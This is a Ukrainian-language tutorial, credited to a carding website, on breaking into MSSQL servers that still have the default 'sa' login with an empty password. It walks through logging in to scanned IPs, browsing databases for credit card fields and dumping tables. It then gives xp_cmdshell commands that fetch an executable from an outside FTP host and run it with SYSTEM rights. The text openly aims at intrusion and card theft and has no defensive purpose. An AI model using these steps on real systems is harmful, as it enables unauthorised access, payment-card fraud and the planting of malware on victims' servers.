По закінченні трьох днів, після відвідування нарколога, і прийняття холодного душу приступаємо, власне до ПРОЦЕСУ.
На даний момент, ви вже маєте масу машин, про які відомо, що на них запущений MSSQL-сервер, який слухає на стандартному порту 1433. Вам не відомо, які з цих серверів, були встановлені адміністраторами-недоучками, типу Вас, читають цю статтю з інтересом, і не подбали про те, щоб змінити стандартний логін SA з ПОРОЖНІМ паролем, на що-небудь пристойніше.
Запускаємо QA, в вискочила віконці вводимо:
- SQL Server: IP зі списку насканенного за допомогою SRA
- Галочку Start SQL if it is stopped НЕ СТАВИМО
- Connect Using: SQL Server authentication
- Login name: sa
- Password: пусте поле
У разі появи повідомлень типу: Login filed for user "sa", Not trusted SQL server connection etc, тиснемо «ОК» і пробуємо наступний IP зі списку.
Ну нарешті, замість обридлого Login filed, отримуємо просто раптом відкрилося, невинно біле, віконце із заголовком типу "Query 12.11.32.45.master.sa" - ВИ ЗАЙШЛИ на SQL-сервер, вітаю =)
Тиснемо F8, зліва з'являється список баз даних, що знаходяться на цьому сервері. Відразу хочу попередити: бази з іменами Master, model, msdb, Northwind, pubs, tempdb є службовими або поставляються з MSSQL як приклади - сенсу їх переглядати немає - тільки в якості самоосвіти.
Якщо в списку баз ви бачите чогось типу ONLINESHOP (=)) тисніть на хрестик зліва від назви бази, у випадаючому списку - на хрестик зліва від User Tables. Перед вами список таблиць бази даних. При натисканні на хрестик зліва від назви таблиці, ви отримаєте список назв полів в таблиці.
З власного досвіду вбивання часу, можу судити, що ПЕРЕВАЖНА більшість імен таблиць і полів НЕСЕ велике смислове навантаження - якщо в базі є номера карток, то швидше за все так і буде написано CreditCardNumber - або в назві таблиці, або в назві поля таблиці.
1. У випадаючому списку зверху вікна QA вибираємо назву потрібної бази.
2. Порт незайману білизну вікна запиту літерками типу:
select top 100 * from users
цей запит поверне верхні 100 рядків з таблиці USERS
select count (*) from users
цей запит покаже кількість рядків в таблиці USERS
xp_cmdshell 'cmd / c echo Admin> ftp1cmd / c echo password >> ftp1cmd / c echo binary >> ftp1cmd / c echo get sr.exe >> ftp1cmd / c echo quit >> ftp1cmd / c ftp -s: ftp1 -d 12.12 .12.12 '
цей запит завантажить з FTP-сервера 12.12.12.12 з логіном Admin і паролем password файл sr.exe
xp_cmdshell 'cmd / c sr.exe'
а цей запит, запустить sr.exe на віддаленій машині з правами SQL-сервера - а це, як правило, або SYSTEM або DomainAdmins.
Якщо хто ще не здогадався, xp_cmdshell 'dir c: \' покаже вміст диска C: \.
Всі права на статтю, належать сайту www.carderplanet.com.
Покажи цю статтю друзям: